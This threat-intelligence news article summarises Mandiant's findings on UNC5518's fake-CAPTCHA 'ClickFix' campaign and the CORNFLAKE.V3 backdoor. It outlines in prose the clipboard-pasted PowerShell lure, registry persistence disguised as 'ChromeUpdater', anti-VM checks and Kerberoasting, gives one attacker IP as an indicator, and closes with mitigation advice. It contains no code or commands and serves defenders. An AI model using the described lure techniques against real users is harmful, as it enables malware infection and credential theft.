UNC5518 Exploits Trusted Sites with Fake CAPTCHAs, Delivering Malware to Unsuspecting Users

Mandiant Threat Defense has uncovered a sophisticated cybercriminal operation where threat actors are compromising legitimate websites to distribute malware through deceptive CAPTCHA verification pages, highlighting the evolving tactics of financially motivated cybercriminals in 2024.

ClickFix Campaign Targets Unsuspecting Web Users

Since June 2024, security researchers have been tracking UNC5518, a financially motivated threat cluster that has perfected a technique called “ClickFix” to deceive website visitors.

The group compromises legitimate websites and serves fake CAPTCHA verification pages that trick users into executing malicious PowerShell scripts copied automatically to their clipboard when they click on what appears to be a standard security verification image.

The attack begins when users encounter these fake CAPTCHA pages through normal browsing activities, often via search results employing SEO poisoning or malicious advertisements.

When victims attempt to “verify” themselves by following the on-screen instructions, they unknowingly execute a PowerShell command using the Windows+R shortcut that downloads and runs malware from attacker-controlled servers.

Mandiant researchers observed the malicious PowerShell command connecting to IP address 138.199.161.141:8080 to retrieve subsequent payloads, demonstrating the sophisticated infrastructure supporting these operations.

The downloaded scripts include anti-virtual machine checks to evade security analysis, examining system resources and computer names to avoid detection in sandbox environments.

Advanced Malware Deployment Through a Partnership Model

UNC5518 operates as an access-as-a-service provider, partnering with other threat groups, including UNC5774, which deploys the CORNFLAKE.V3 backdoor through the compromised access.

This partnership model allows specialized groups to focus on their core competencies while maximizing the impact of initial compromises.

CORNFLAKE.V3 represents a significant evolution from previous versions, transitioning from a simple downloader to a full-featured backdoor with persistence capabilities.

The malware downloads and installs Node.js runtime environments to execute JavaScript payloads outside traditional browser security constraints, establishing persistence through Windows registry Run keys disguised as “ChromeUpdater”.

The backdoor supports multiple payload types, including executables, DLLs, JavaScript, and batch files, while conducting extensive reconnaissance activities, including Active Directory enumeration and Kerberoasting attacks to harvest credentials.

Recent variants have also adopted PHP as an execution environment, demonstrating the threat actors’ adaptability to evade detection.

Enhanced Security Measures Required

Organizations can mitigate these attacks by disabling Windows Run dialog functionality where possible and implementing robust logging systems to detect suspicious PowerShell and Node.js activities.

Mandiant has released detection rules through Google Security Operations, including queries to identify PowerShell launching Node.js from AppData directories and suspicious connections to legitimate infrastructure domains.

The collaborative nature of these threats, where initial access providers work with specialized payload operators, represents a concerning trend in cybercriminal operations that demands enhanced organizational security awareness and technical controls.

Find this Story Interesting! Follow us on Google News , LinkedIn and X to Get More Instant Updates

The post UNC5518 Exploits Trusted Sites with Fake CAPTCHAs, Delivering Malware to Unsuspecting Users appeared first on Cyber Security News.